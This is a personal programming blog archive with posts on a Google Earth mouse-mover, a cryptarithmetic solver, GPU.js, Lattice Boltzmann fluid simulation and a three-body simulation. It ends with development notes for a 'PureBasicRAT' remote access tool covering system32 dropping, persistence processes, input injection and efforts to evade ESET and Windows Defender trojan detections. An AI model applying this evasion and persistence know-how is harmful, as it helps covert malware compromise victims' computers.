CodeWorth: 2020

Friday, December 18, 2020

PixelTraverser

I don't know if I should even be posting this program given how niche a function it was designed to serve. Basically, it moves your mouse cursor around within a specified rectangular region in the screen. The idea was to create as many pathline points within an area of interest on Google Earth as possible with the hope of exporting a .kmz file corresponding to the points, feeding which to www.gpsvisualizer.com would produce a .gpx file containing their relevant elevation info. This elevation info was then to be used to make an interpolated elevation surface, TIN/DEM, in QGIS which I had planned to make use of in HEC-RAS for my 2D rain-on-grid model. But turns out the DEM so generated is worthless, at least that is what I've found as of this writing.

So, that was the whole point of the program. I made it just so that I didn't have to manually drag around my mouse for hours to get what I had assumed would be a reasonable number of points. It did really help generate ~160,000 points over a catchment area of ~700 km2 fairly quickly but the DEM output was rather underwhelming, so I wasn't sure what actual purpose this program would serve, hence my hesitation to put it up here.

At least I installed Visual Studio 6 for Visual Basic 6 and wrote a meaningful(?) program in a long time. Certainly jogged old memories. Turns out, an installer for vb6/VS6 is very hard to come by on the internet now. It wasn't like this back in the day, ~10 or heck even 5 years ago. I guess people have moved on from vb6. But it still feels so snappy and lightweight for what it can still do very well, unlike the more mainstream feature-rich, often bloated IDEs of the day. Or maybe it's just my 6 year old laptop talking through me, I dunno. Here's a video of the thing in action for what it's worth:

Here's a screenshot of the program itself:

The project can be found at GitHub

Tuesday, September 29, 2020

CryptArithmetic solver

It had been a while since the last time I made anything. So, I took the opportunity to make a simple implementation of a CryptArithmetic problem solver in JavaScript. (Look it up on Google. Tonnes of resource on the topic) This kind of problem was brought to my attention by my brother who has to study it as part of his AI course.

The implementation is pretty basic. There's nothing fancy going on here - no clever algorithm, just pure bruteforce. It makes a list of all the unique letters of the three words given to it. Then, it assigns random digits to them with no repetitions allowed. So, there's a one-to-one correspondence between the letters and the digits. That is to say, each letter has a unique digit assigned to it - no other letter has the same digit. Also, a constraint that no letter that initiates any of the three words can be assigned 0 is imposed. Then, the letter-digit assignment is used to construct numbers for all three words and the sum is checked. If it matches, great - the process is stopped and the solution is assumed to have been found. If not, the process continues with another set of random assignments until a timeout is reached. The number crunching itself is done using a WebWorker so as to keep the UI thread responsive. The UI is basic too. I even forgot to put a textbox to specify the timeout. So that has be done in code right now. That's all there is to it.

Here's the GitHub repo and here's the demo

Tuesday, July 7, 2020

GPU based parallel computations in browser with GPU.js

I've been tinkering with General Purpose GPU (GPGPU) programming in JavaScript. The original motivation for this was to accelerate the compute-intensive LBM fluid simulation from my previous post.

This video was the launching pad for me towards in-browser GPGPU. It shows how the WebGL API can be used for leveraging the massively parallel computational potential of graphics cards. While originally intended for graphics operations in the web browser, a web port of OpenGL, if you will, WebGL can be (ab)used for parallelized general purpose computations in the hundreds of cores that can be expected in today's GPUs. I found out that there are a couple of options for GPGPU in JavaScript. By far the most popular is the GPU.js library, owing to its simplicity and the level of abstraction it provides.

There is the turbo.js library (if you can call it that, the source isn't much to look at) but I didn't know what to make of it, documentation is non-existent and examples but one or two. But maybe that's because it requires writing the kernel code (a kernel code is a piece of code that runs in all the cores of a GPU simultaneously, each instance typically operating in different parts of the same data structure, say different elements of an array, thus allowing for parallel computations) in GLSL and I don't know GLSL.

One of the cornerstones of GPGPU code (read kernel), from what I've gathered, is that it has to be able to access different parts of a data structure using the same piece of code (the kernel). GPU.js does this beautifully using this.thread.x for 1D array data, this.thread.x and this.thread.y for 2D array data and this.thread.x, this.thread.y and this.thread.z for 3D array data. Each instance of the kernel code residing in an independent GPU core is assigned different values for these variables. Hence, each kernel code instance on each core can operate on different parts of the given array at the same time.

GLSL is a language for writing shaders (a fancy term for kernel code but used in graphics operations). Maybe I was unwilling to go too deep into the topic but I couldn't as easily find a similar construct in GLSL and hence turbo.js using a few google searches. Maybe that's how things go for a shading language - maybe a GLSL kernel instance doesn't need to know which core it is residing in - or may be not, I don't know. So, after emailing the author of turbo.js with similar inquiries hoping for some resolution, I just stuck to GPU.js

There seem to have been a couple more attempts at providing GPGPU functionalities using WebGL apart from these two libraries, as I found out in this excellent article titled General-Purpose Computation on GPUs in the Browser Using gpu.js, namely WebCLGL.js and WebMonkeys but I didn't bother. All but GPU.js seem to be but dead or discontinued or unable to garner much attention.

GPU.js is great, kernel code can be written in JavaScript, has nice abstractions and conveniences, has relatively good documentation, great examples, seems to be in (active?) development, seems to have more users and all that but there's still some issues that I didn't have to do much tinkering to run into. One of these is about large loops in kernels. Whenever there's over 1100 or so iterations, on my PC at least, the code fails and returns all zeroes. A code example in the documentation in the GitHub repo for the project reads as following:

The above code is for multiplication of two square matrices a and b each of size 512. If the size of the matrices is increased to anything greater than ~1100, the code fails(at least on my computer), as I described before. There is a GitHub issue regarding this exact problem. Apparently it's got to do with the way 'loop unrolling' is done by the (graphics?) driver.

One way to deal with it, according to the discussion in the GitHub issue, seems to be to break the loop up into smaller loops. I tried that myself but didn't get it to work. So, I had to divide the matrices into blocks of smaller matrices(a process known as partitioning) and operate on each block as if they were the elements of the original matrices. That worked. Now I could do a 2000x2000 matrix multiplication using blocksize of 1000 and GPU.js wouldn't give me all zeroes. Hoorah!

Now some benchmarks on my computer:

10x10 matrix: CPU - 0 ms | GPU - 500 ms

100x100 matrix: CPU - 7 ms | GPU - 1,200 ms

256x256 matrix: CPU - 128 ms | GPU - 2,700 ms

512x512 matrix: CPU - 2,200 ms | GPU - 3,000 ms

750x750 matrix: CPU - 9,400 ms | GPU - 3,200 ms

1000x1000 matrix: CPU - 25,000 ms | GPU - 5,000 ms

2000x2000 matrix: CPU - 224,000 ms | GPU - 40,000 ms (using blocksize of 1000. Smaller blocksizes take more time since a smaller number of computations are done in parallel then)

This goes without saying that this is not the most optimized matrix multiplication program out there, not by a long shot, and the way that partitioning is achieved here has a lot of say in how the algorithm performs for larger matrices(this can be gauged from the whopping, rather disappointing jump from 5,000 to 40,000 ms in going from matrix size of 1000 to 2000). Notwithstanding this, matrix multiplication seems to be the de-facto hello world program in parallel-computation land.

That's it for this post. I just wanted to share my experience with this amazing piece of technology and the kind of difference it can make versus the CPU in a variety of parallelizable tasks that go far beyond the simple matrix multiplication problem.

Here's the code I used for the benchmarks.

P.S. My browser(Firefox Developer Edition version 79.0b4 64-bit) seems to use my built-in graphics Intel HD Graphics (GPU0) and not my dedicated card AMD Radeon R7 M265 (GPU1). I don't know if there's a way to change that.

Tuesday, June 30, 2020

Fluid Simulation using Lattice Boltzmann Method

TL;DR
This is a Lattice Boltzmann fluid simulation implemented in (unoptimized) JavaScript. Graphics is handled using the p5.js library and the lodash library is used for deep cloning an array of objects. A short clip showing a planar obstacle shedding vortices is presented below:

Here's the link to the project and here's the live demo.

The details:

I'd been watching Prof. Patrick Winston's MIT OpenCourseware lectures on Artificial Intelligence ~last month. As a result, I started searching for related stuff on YouTube, Coursera, edX and the like. In the process, I guess being bombarded by recommendations and suggestions from these sites on a great breadth of subjects, I got interested in simulating(and visualizing) physical processes often represented by differential equations. I'm not totally certain why I gravitated towards it but it's probably because of how accessible that seemed at the time - aside from the obvious reason of it being a field very familiar to me - and it had been a while that I had written code, I guess I wanted a hit. So, I started with the 3 body problem. That was trivial to implement and it was done and dusted in a matter of hours. Then I went on to the 1-D heat/diffusion equation. While the Finite Difference implementation of the PDE was simple enough to be worked out on a spreadsheet, I really enjoyed the insightful conservation-law based derivation that took me down a rabbit hole of transport phenomena.

After my interest faded from the heat equation, I turned towards the Navier-Stokes equations - after all, they were in the same class of problems as the heat equation, only more universal; and if I could simulate the NS equations, I would be able to make some cool-looking fluid animations. After tinkering around some, to my disappointment, I found out that the pressure term had no obvious solution. This shoved me towards another engrossing journey. For the supposed civil engineer that I am, it was embarrassing that I had no idea that the study of simulating the Navier-Stokes equation was in itself a huge, distinct field owing, in part, to the difficulty arising from the pressure term - I should've known at least that much. Much YouTube and Google searches went into understanding some of the workarounds that people seemed to have come up with over the years - vorticity-streamfunction and artificial compressibility methods are the two I remember. NPTEL's course on Computational Fluid Dynamics was really helpful. Sure, I understood better what beast I was dealing with, but the deeper you gauge, the darker the abyss looks. I just knew there were going to be a lot of headaches down the road. Presumably, one had to use staggered grid to avoid numerical instabilities, putting that down in code I didn't know how it was going to look like. Similarly there was the complication that boundary conditions for obstacles to the flow and the computation domain could pose. And all that trouble would be for naught if the computation proved to be too CPU-intensive to run a simple demonstration on a regular PC. Giving up on the idea aside, I did learn here what on earth I'd been taught in modelling the Debris Flow phenomenon in Water Induced Hazards curriculum of Water Resources Engineering. Terminologies such as 'upwind scheme', 'staggered grid', 'vector and scalar points' made a lot more sense after this. I wish I'd been given more explanation regarding the matter in class. Amazing how internet doesn't really give you an easy answer for whatever you have to throw at it. Niche topics have niche search results no matter how close they actually are to a wildly popular counterpart. Anyway, I did learn the modern scene of fluid simulation from the experience. I got to know that creating physically accurate fluid models for real-life engineering and scientific tasks takes a lot of computational effort and rigor and that simulation for the visual appeal alone for the field of computer graphics has been figured out fairly recently: Jos Stam's approach comes to mind. The derivation of and an approach to simulating the NS equations also taught me a few things about vector fields and linear algebra, such as the now-obvious-seeming Helmholtz decomposition theorem.

Anyway, after exploration of the NS equations, the magic of the internet gently pushed me towards another way to do fluid simulations. Enter, Lattice Boltzmann Method. This technique doesn't bother with the NS equations at all. Instead of trying to discretize and solve a PDE for macroscopic variables: velocity and the pressure, the LBM works from the bottom up. It recognizes that the continuous-seeming macroscopic properties emerge out of the microscopic phenomena of molecular activities. So, the LBM, it seems, is based on the Kinetic Theory and statistical mechanics. Now statistical mechanics isn't something I studied in university so it's not a subject that I'm comfortable working with, but upon typing the term "Lattice Boltzmann simulation" on YouTube, I saw numerous videos that made it seem so easy to simulate a flowing fluid. I thus set out on implementing my own version of the LBM. There was a lot of good content on the internet, from YouTube videos to free online courses on Coursera. I also referred to multiple books and texts on the subject. Among them, the Coursera course on Simulation and Modeling of natural processes from the University of Geneva and the books: [ a) Lattice Boltzmann Modeling - An introduction to geoscientists and engineers by Michael C. Sukop and Daniel T. Thorne, b) The Lattice Boltzmann Method - Principles and Practice by Timm Kruger, Halim Kusumaatmaja et al, c) A Practical Introduction to Lattice Boltzmann Method by Alexander J. Wagner, and d) Review of Boundary Conditions and Investigation Towards the Development of a Growth Model: a Lattice Boltzmann Method Approach (Doctoral Thesis) by Albert Puig Aranega ] and a classroom handout(I believe) and a live simulation webpage by Prof. Dan Schroeder of Weber State University at http://physics.weber.edu/schroeder/fluids/ proved to be extremely valuable in this project. With the help of these resources among others, I also acquired a bird's-eye view of LBM and the fluid simulation scene as a whole: there was the top-down approach of discretizing the NS equations, there was the completely microscopic viewpoint of Smoothed Particle Hydrodynamics which turns out requires simulating and tracking the motions of an unimaginably humongous number of fluid molecules to be of any practical use for dense fluids such as water, and there was the LBM- a compromise between the macroscopic and the microscopic treatment of fluid motion, the so called "mesoscopic" approach. While complete description of the LBM technique is obviously not possible in a simple blog post as this, as must be evident by the books on the topic I've mentioned above, I will try to summarize how I implemented it in code.

In Lattice Boltzmann Method, space is divided up into 'lattice points'. Now depending on how many dimensions you want to work with, LBM can be 1D, 2D or 3D. This project is a 2D LBM implementation and thus the XY plane is used as the domain of simulation. The program I've written explicitly draws a specified number of regular rectangular grids on the plane. The centroids of the square cells so formed are taken as the lattice points to be assigned properties according to the LBM. Note that this definition of lattice point as the centroid of a cell is completely arbitrary, what matters is that their ordering(and if visualization is important, their spacing as well) be respected - the LBM from what I've understood working on this project, doesn't have a built-in assumption about the nature of lattice points, it is implementation-specific. Now, each lattice point, according to 2D Lattice Boltzmann, is given a set of particle distributions for each of 9 directions (this is called the D2Q9 scheme) : Rest, Eastbound, Northbound, Westbound, Southbound, NorthEastbound, NorthWestbound, SouthWestbound and SouthEastbound. It may be beneficial to observe the use of the term 'particle distribution' as opposed to individual particles in understanding, partly, why the LBM is called a 'mesoscopic' approach. Now, each of these distributions can be assigned a direction vector, together forming a unit circle. In simpler terms, each of the aforementioned particle distributions are assigned direction vectors: [0,0],[1,0],[0,1],[-1,0],[0,-1],[1,1],[-1,1],[-1,-1] and [1,-1] in order. In most literatures, the particle distribution (a scalar) is represented as f with a subscript denoting the direction it belongs to and the direction vector is represented as e with a subscript also denoting its direction, the subscript running from 0 to 8 for each of the nine directions. Besides these quantities, there are also the so called weights denoted as w associated with each direction.

The basic idea in the Lattice Boltzmann Method is that particle populations in all the lattice sites undergo two steps: streaming/propagation and collision/relaxation. Streaming aims to emulate the transfer of properties throughout the fluid whilst collision is an approximation of the tendency of the fluid to equilibriate(read settle down). The heart and soul of this treatment is statistical mechanics as I mentioned before and the so called Lattice Boltzmann Equation, aka LBE in the literature. Motivation for the streaming step may be obvious if we are to have any chance at emulating a transport phenomenon where properties such as velocity and density are pushed around but the collision step may warrant a short explanation. If oversimplification is no concern, basically the motivation for collision is that properties of particles that are further away from the equilibrium/average values are gradually shifted towards the equilibrium. This is also why this step is also called the relaxation phase: properties that are away from the norm ease into their equilibrium values. From a molecular perspective, collision between molecules does push the overall state of the system towards an equilibrium and a state of homogeneity/isotropy.

Streaming just transfers one cell's particle populations/distributions to its appropriate neighbors. The term 'appropriate' serves to encapsulate the idea that a cell that is streaming away its particles to its eight neighboring cells does it in the following rather intuitive way: the Eastbound particle distribution f₀ replaces the eastern neighbor cell's Eastbound particle distribution and so on for all the eight directions; the rest population is not streamed anywhere. This is done with all the cells in the grid but you have to be careful not to overwrite information on a neighboring cell that still needs to be used for streaming from that cell to its neighbors. So what is typically done is two copies of the grid's cells with all their information are made and one of the copies is updated with stream information from the other which remains unchanged throughout the process. This is important because streaming is supposed to be a simultaneous process. Now, what I've just described is for interior cells(I've been using the term cell and lattice point interchangeably) meaning a cell that has all its neighbors as actual fluid cells. Here, I should explain what a fluid cell is versus what a non-fluid cell is. In real life, you'll want to see how a fluid flows around an obstacle. So, we need a way to represent these barriers that do not allow flow to pass. What is typically done is the grid cells that are supposed to be these obstacles are marked in some way, if you implemented a cell as a class, maybe you could give it a descriptive property : maybe a boolean variable called isSolid. Anyway, you know which cell is a fluid and which isn't, however you implement it in code. Now any cell that is surrounded by actual fluid cells (with isSolid property set to false, say) is an interior cell and the aforementioned process of streaming holds good. But if any of its neighboring cells is a solid cell(an obstacle), you perform a so called 'bounce-back'. It is pretty simple: the cell that is streaming its particles upon encountering a solid neighbor gets back the same particle distribution but in the opposite direction. If you had a cell undergoing streaming with a solid northeast neighbor, upon streaming the northeastbound particles f₅ to it, the streaming cell itself gets its northwestbound distribution f₇ 's value changed into the value of the f₅ it was trying to stream instead. The neighboring solid cell doesn't undergo any change as should be obvious. Hence, the term bounce-back. Now, there seems to be two versions of the 'bounce-back' approach to solid boundaries, namely the full bounce-back and the halfway bounce-back but at its simplest, this is how it works and indeed how it's implemented in my code. It is worth pointing out that the bounce-back boundary translates to the macroscopic no-slip condition of fluid flow.

Now, onto the collision step. Collision, in the broadest of sense, being an easing into some kind of equilibrium, has a number of different approaches. The simplest of these seems to be the BGK (Bhatnagar-Gross-Krook) collision process which works as follows. You calculate the equilibrium particle distributions f_i^eq for all the nine directions (i=0 to 8) using an expression derived from, it seems, the Boltzmann distribution of particle velocities. No further knowledge of the actual physics of this particular distribution is required to implement it in code. The expression is as follows:

Here, the weights w_i are the constants 4/9 for i=0(rest direction), 1/9 for i=1,2,3,4(E,N,W,S) and 1/36 for i=5,6,7,8(NE,NW,SW,SE). If I understand correctly, these values are what they are if the conservation of mass and momentum is to be satisfied in collisions. Density ρ is the cell's density calculated as:

c is the speed of sound and is usually taken as unity. The vector e_i is the direction vector pertaining to the direction i as mentioned a few paragraphs above i.e. [0,0] , [1,0], [1,1] and so on. The vector u_i is

the actual velocity vector of the cell calculated as:

After the equilibrium particle distributions f_i^eq have been calculated for all nine directions, the relaxation equation as given by BGK is used:

Here, 𝝂 is the viscosity term supposedly to be between 0 and 2. If the multiple f_i terms look confusing, all this equation means is you perform the operation on the right hand side and update the value of f_i for each direction i.

Okay, having explained the working equations of the collision operation, it is important to observe that it is a wholly local process i.e. no neighboring cell's information is used here. Sure, the particle distributions will be changing with time because every fluid cell will be streaming to every other fluid cell and thus changing the macroscopic properties of density and the velocity but the collision itself is dependent only the cell's current properties.

That's all about the two steps of the LBM algorithm. But there's still an important aspect left to explain: domain boundaries. Since we're only simulating in a small region of space, we must specify how the fluid behaves at the interfaces: the top, bottom, left and the right boundaries. Usually, we want these to be open boundaries for a freely flowing fluid. More often than not, the left boundary is the inlet from where the fluid flows into our system. As such, it makes sense to hold the inlet column of cells at such particle distributions that upon calculating their macroscopic parameters, densities and velocities, they amount to a constant of our choosing. In my code, I've set the incoming fluid's density as 1 and the velocity something lower than or equal to 0.3. LBM seems to be unable to cope with velocities near the speed of sound c(usually taken 1), so anything over 0.3 is liable to render the simulation unstable. So, the first column of our fluid cells are constrained to a constant velocity and density, meaning they are not streamed into. Now, the way to calculate the particle distributions is actually using the first expression, that for f_i^eq . We calculate these for all the directions for our choice of velocity and density and assign them to the inlet cells and we don't touch them as far as modifying their distributions is concerned. Information flows from these cells, not to them.

Then the last column of cells. We can do two things here. We can either impose a so called 'periodic boundary' or a 'static boundary'(I made this up, dunno if that's the actual term). In a static boundary approach, we assign to the last column of cells, the outlet cells, the values of the cells immediately to their left. (At this point, you should know whenever I'm talking about values, it's the particle distributions f_i.) This is supposed to pretend that there's no longer a variation in the flow properties between the columns of cells near the outlet and they're infinitely far from whatever obstacles our system may have. The alternative is 'periodic boundary' where our code pretends that the column of cells immediately to the right of the outlet cells is in fact our first column of cells, that is the domain behaves like a loop from back to the front. In this case, the inlet column of cells would in fact be streamed into from the last column and so on as if they were no different than any other column of interior cells. When I tried this, the simulation was way too unstable for my taste so I stuck to the static boundary approach.

Now for the top and bottom boundaries, the most common approach is to apply the periodic boundary to them both so that the top wraps back to the bottom row of cells when they try to stream to the cells above and vice versa for the bottom row of cells. And this is what I did in my code.

As far as the initial conditions are concerned, each cell may be initialized with a particle distribution according to the required inflow fluid velocity OR with zero velocity. I've found better results when initialized with the inflow velocity.

Putting it all together, we have a simple algorithm when done right produces amazing looking fluid animations. The steps I've followed in my code is: initialize all the cells, collision, streaming, calculate the cell's macroscopic parameters, output, repeat from collision.

I think I've explained the general method mostly completely. Now, I'm going to briefly describe my specific implementation in JavaScript. The cells are represented as an array of rows, each row being an array of cells of the row. Each cell is an instance of a Cell class. Each cell instance stores its own particle distribution as an array, its macroscopic velocity and density and a flag as a marker for whether it is a solid obstacle. There's also the weights and the direction vectors that really are constants and really should've been static members seeing as they don't differ between instances but I am under the impression that JavaScript doesn't yet have full support for static members in classes. The grid has its first and last rows and columns as boundary cells (read dead cells) that have nothing to do with the actual fluid or obstacles but are there just for visualization reasons and are marked as green cells (at least as of this writing); we do not iterate through them in the algorithm. For convenience, from here on out, I will thus refer to the second rows and columns as the first and the penultimate rows and columns as the last.

The first column of cells is initialized with the required inflow velocity's corresponding equilibrium particle distributions. This is our inlet/inflow column. This column is unconditionally assigned the color red. Depending on a switch, the rest of the other cells are either initialized to a particle distribution corresponding to zero velocity or the same inflow velocity as the first column. Personally, I favor initializing every cell to the inflow velocity's corresponding distributions.

After initialization is done, I perform the collision step, followed by the streaming process on all fluid(non-solid) cells, except those on the first column(the inlet column). Why the exception? I implement a fixed inlet boundary condition i.e. the inlet column never changes its properties and is never streamed into, and collision would have little effect since it always is at the equilibrium distribution f_i^eq corresponding to the specified inflow velocity.

A little detail regarding the streaming process: there's two possibilities for implementing this - iterate through all the fluid cells and stream out from them to their non-solid neighbors OR iterate through all the fluid cells and stream into them from their non-solid neighbors. At first, I inadvertently wrote the first kind of streaming procedure and then later, I rewrote it as the second kind. The second kind turned out to be shorter and I think a bit more efficient. Think of it as pulling the distributions from the respective neighbors into the cell and keeping it as its own(in the same direction). In case of a solid neighbor, there's nothing to pull from there, so the distribution in the direction of the neighbor is reflected right back to replace the cell's distribution in the opposite direction.

The open boundaries are: fixed inlet boundary, static outlet boundary, periodic top and bottom boundaries. For the fixed inlet boundary, the first column's cells are held at a constant equilibrium particle distribution corresponding to the specified inflow velocity and never changed throughout the simulation. Streaming doesn't occur into these cells and collision is pointless for these cells since all collision does is push the distributions towards the equilibrium anyway. For the static outlet boundary, the final column's(outlet/outflow column) distributions are copied from that of the column to the immediate left. The upper and lower boundaries loop back to each other in that 'above' for the first row is defined as the last row and 'below' for the bottom row is defined as the first row.

After collision and streaming, finally each cell's macroscopic parameters, density and velocity, are calculated according to the second and third expressions given a few paragraphs above.

Finally, while drawing it out on the canvas, the velocity's y component is inverted in sign since computers assume the origin to be at the top left corner. And a few other cosmetic manipulations for a more sensible visualization are made before actually doing the painting.

The end result is a visually pleasing animation in the web browser.

References:

1. Lattice Boltzmann Modeling: An Introduction for Geoscientists and Engineers

2. The Lattice Boltzmann Method: Principles and Practice

3. A Practical Introduction to the Lattice Boltzmann Method

4. Lattice-Boltzmann Fluid Dynamics

5. Live fluid simulation with LBM

6. Simulation and modeling of natural processes

7. YouTube in general

among others.

Wednesday, June 3, 2020

Three-body problem simulation

This is a simple program that uses Newton's laws for simulating the trajectories of a given number of bodies interacting gravitationally. Uses the p5.js JavaScript library. It is quite fun to watch the ensuing chaos; if the masses don't get ejected off their orbits that is.

GitHub repo
Live demo

Thursday, May 14, 2020

PureBasicRAT v2

Drop to system32 fixed
Indefinite HTTPRequest() wait fixed with a timeout of 10s
Persistence functionality offloaded to a dedicated thread
Delay times increased for stability
Added four new functions: /keypress, /lclick, /rclick, /mclick

Development notes:

Musings During Development
Of PurebasicRAT v2
In PureBasic 5.70
--------------------------
[08:31PM|May 11, 2020]
*If you want to pass array to a thread procedure(so as to read or return into it) using CreateThread(), passing the array directly as the second parameter won't work. Enclose the array as a member of a Structure and pass the pointer to the structure to CreateThread() instead. Example:
-----------------------------------------------------------------------------
EnableExplicit

Structure threadParam
Array somearray.i(0)
EndStructure

Define param.threadParam
Define i.i,thread.i

Procedure ThreadProc(*param.threadParam)
Delay(5000)
Dim *param\somearray.i(0)
ReDim *param\somearray(1)
*param\somearray(0)=4
*param\somearray(1)=231524

EndProcedure

thread=CreateThread(@ThreadProc(),@param)
WaitThread(thread,1000)
If IsThread(thread) ;thread is stuck, most likely at the HTTPRequest function
KillThread(thread)
Debug "Thread killed!"
EndIf

;ThreadProc(somearray())

For i=1 To ArraySize(param\somearray())
Debug Str(param\somearray(i))
Next i
-------------------------------------------------------------------------
[11:44PM|May 11, 2020]
*The stub just got detected by ESET Smart Security. Win32/Agent.UFQ Trojan. Should've disabled ESET LiveGrid submission. Will try to change a couple things to throw it off. BTW, kleenscan.com is a site that offers free no-distribution AV scans. Seems to be a project by an HF member.
[12:19PM|May 12, 2020]
*MSDN gives the impression that SendInput() is in some ways "weaker" while "higher-level" than keybd_event(), which it supersedes, in that the Return Value section says that SendInput() is UIPI-aware. No such remark seems to be made for the keybd_event() function. I checked, keybd_event() is just as aware of user privilege level. No benefit in using keybd_event().
*Applications typically (not all games though) ignore the key scancode and only care about the virtua keycode, that's why most of the time, one can get away specifying only the first parameter of the keybd_event() function. ref:https://stackoverflow.com/questions/15062577/what-is-the-meaning-of-the-bscan-parameter-value-0x45-in-keybd-event
[02:55PM|May 12, 2020]
*I always make the error of forgetting to bitshift after and'ing when calculating the high-order byte(MSB) (generally of a SHORT data). Case in point, VkKeyScan()
[12:42PM|May 13, 2020]
*mouse_event() and keybd_event() are much simpler to use than SendInput(), probably the reason I don't remember ever using SendInput() before.
[03:55PM|May 13, 2020]
*CPU Usage has shot up. Probably coz I decreased the Delay() times everywhere. Increased it back a bit in the persistence routine, so it's a tad better now. But still not very good. Clearly shows on the task manager. Also, haven't managed to shake off that Win32/Agent.UFQ detection by ESET Smart Security.
[07:03PM|May 13, 2020]
*ESET Smart Security detection chain:
commandexecutor.pbi->machineinfogatherer.pbi,messagesender.pbi
Inside machineinfogatherer.pbi:
CPUName()
[09:42PM|May 13, 2020]
*Found another bug. If the drop path is selected to be %system32% and the x86 binary is used on a x64 system, the function getDropPath() in configreader.pbi outputs "C:\Windows\system32" which is wrong. Due to the "File System Redirector" (https://docs.microsoft.com/en-us/windows/win32/winprog64/file-system-redirector) , using this path in any file operations such as CopyFile(), DeleteFile() and OpenFile() is redirected to "C:\Windows\SysWOW64" instead. As a result, the server is copied into the "C:\Windows\SysWOW64" folder and runs from there only to do a comparison with "C:\Windows\system32" thus repeatedly copying itself to the same path("C:\Windows\SysWOW64") over and over. The guilty code is the following line in getDropPath() procedure in configreader.pbi file:
----------------------------
Case "%system32%"
retval=GetEnvironmentVariable("windir")+"\system32"
----------------------------
where we're manually tacking the string "\system32" to the %windir% path. We need to do a check here. If we're a x64 executable, the code is fine. If we're a x86 executable, we need to check the OS. For that we use the IsWow64Process() function. If the OS is x64 (and process is x86), the second parameter of the function is TRUE; so the "\system32" will have to be replace with "\SysWOW64". If the OS is x86 (and process is x86), FALSE; the code is fine.

ref:
https://stackoverflow.com/questions/3094520/how-to-retrieve-correct-path-of-either-system32-or-syswow64
https://stackoverflow.com/questions/23696749/how-to-detect-on-c-is-windows-32-or-64-bit
https://www.purebasic.fr/english/viewtopic.php?f=12&t=40061
https://docs.microsoft.com/en-us/windows/win32/api/sysinfoapi/nf-sysinfoapi-getnativesysteminfo
https://docs.microsoft.com/en-us/windows/win32/api/sysinfoapi/ns-sysinfoapi-system_info
[09:12AM|May 14, 2020]
*I did a control test of whether a timer or a sleep loop would be better for minimizing CPU usage. (ref: https://stackoverflow.com/questions/15685095/how-to-use-settimer-api ) Turns out, there's not much difference:
-----------------------------------
; 0.12% CPU usage:
Repeat
Debug GetTickCount_()
Delay(50)
ForEver
-----------------------------------
; 0.14% CPU usage:
Procedure timerProc(_.i,__.i,___.i,____.i)
Debug GetTickCount_()
EndProcedure

Define msg.MSG
SetTimer_(0,0,50,@timerProc())
While GetMessage_(@msg,0,0,0)
DispatchMessage_(@msg)
Wend
-----------------------------------
If anything, unlike what I had thought, the timer performed worse. I tried with an interval of 100ms as well. The results were similar.
Guess there's no escaping it.
[01:23PM|May 14, 2020]
*When I run the server in my VM(Win10x86,2GB RAM), Windows Defender seems to pick it up(Win32/Hupigon.CN). Don't know if it's related but the server fails to run from the right install directory. Copying to the install directory is done alright but the program doesn't run from there. It just exits. Probably because the server in the install directory loads up too quick and detects the previous instance before it has time to quit. So, gotta add a "/delay" switch to the commandline for such launches and check for it in the beginning of the program and sleep for a couple seconds before continuing. Similar thing happens when starting the persistor. In persistence.pbi, copying the persistor to temp and running it there happens fine. But as soon as another iteration of the realtime persistence loop starts, the server still doesn't detect the persistor running. Hence, this continuously spawns random persistor exes in temp and runs them but the fact that the persistor is never detected by the server implies the persistor itself isn't running. I'm guessing it's the same thing as the server's launch from right folder problem-the new instance from the install path runs too quickly and detects the old instance and quits. Gotta add the delay switch to persistor as well that. Gosh, the whole setup seems so brittle.
*TL;DR we need both the server and the persistor to pause a while IF THEY'VE BEEN LAUNCHED BY THEMSELVES so that multiple-instance-check isn't triggered which would otherwise cause the programs to just stop.
*Oddly enough, it doesn't happen outside the VM, in the real machine.
[03:15PM|May 14, 2020]
*Got duped by the ProgramParameter() PureBasic function. The parameter is optional but the parameter index is increased each time the function is called. Lost about an hour to this.
*Just discovered how glitchy ProcessExplorer can be(in a VM anyway)

Monday, May 11, 2020

PureBasicRAT

This is a Remote Administration Tool I've made using PureBasic. I wanted to learn the language, so decided to do it with this project. The project code is compatible with both x86 and x64 architectures, just compile the source with the corresponding PB compiler. The GitHub repo is here The builder is a simple GUI that looks like:

I've etched the thoughts that came to my mind during the development in a text file the contents of which I'm going to put down here. So, I won't be doing any further explanation. The flow of the program is summarized in a 'flowchart.html' file available in the repo linked above:

Musings During Development
Of PurebasicRAT
In PureBasic 5.70
--------------------------
*hard time finding good examples online. documentation is good and beginner-friendly most of the time though. i know, small userbase
*messy array/pointer/list returning from procedures. better off filling a parameter buffer
*confusing syntax, especially with EnableExplicit on. shows the language is geared towards not doing that.
*the module system is a joke. better-off without it
*ArraySize() gives the size of the array AS SPECIFIED WITH DIM OR REDIM. this is trippy as well. ArraySize of 0 would mean there's one element in an array. I guess this is in conforming with QBASIC/VB6 syntax. seems like i've forgotten how looping through an array worked in VB6, lol.
*there's no way AFAIK to check if a dynamic array is empty in purebasic if you start from the index 0. to declare a dynamic array, you must specify a size (unlike in vb6). so, dim a() is not possible. it must be dim a(0) or some other positive number instead of 0. but you don't know what the final size of the array is going to be! that's what a dynamic array is for! if it is something returned from a procedure, you will want to check if there's any element in the array. but if the array is 0-indexed, there will always be that a(0) i.e. the first element created during dim'ing. ArraySize() will return 0 regardless of the return value of the procedure. maybe the procedure didn't add any element. maybe it added just one element. we don't know. can't tell using ArraySize() alone. So, best use 1-based index.
*redim array(0) is valid. it makes room for a total of one element in purebasic. see arrays in purebasic help file
*jsonarray is 0-indexed
*output file size quickly balloons even when GUI api, the likes of OpenWindow() and such, haven't been used. the network library functions single-handedly add 200KB. single line of code: UsePNGEncoder() adds another 220KB
*good purebasic guide : https://www.ninelizards.com/purebasic A lot of google searches point there
*StringField() is not well documented. had to fiddle around with it to figure out what exactly it did. it's nice.
*variables going out of scope when creating threads from procedures. nice. learning some. use of Static variables in procedures
*nightmare to find where a method has been implemented for projects involving multiple include file
*resources that were easily available a few years ago on some topics(like HTTP mechanism) seem to be lost to the vastness of the internet now. i don't know if i'm totally correct but IIRC, there was a website that did an excellent job of completely describing the totality of HTTP to a beginner. i can't seem to find that exact resource readily now. maybe i'm just imagining things. maybe there wasn't just one such great resource. maybe https://www.jmarshall.com/easy/http/ is it? Got that from a StackOverflow answer https://stackoverflow.com/a/2773415/7647225
*a lot of my time is being spent revisiting how I coded things in VB6 back in the day. I sure hope it doesn't always hold me back. i did a lot of things without actually understanding how it worked, learning by seeing other people's code. case in point, reading binary file's content into a string buffer.
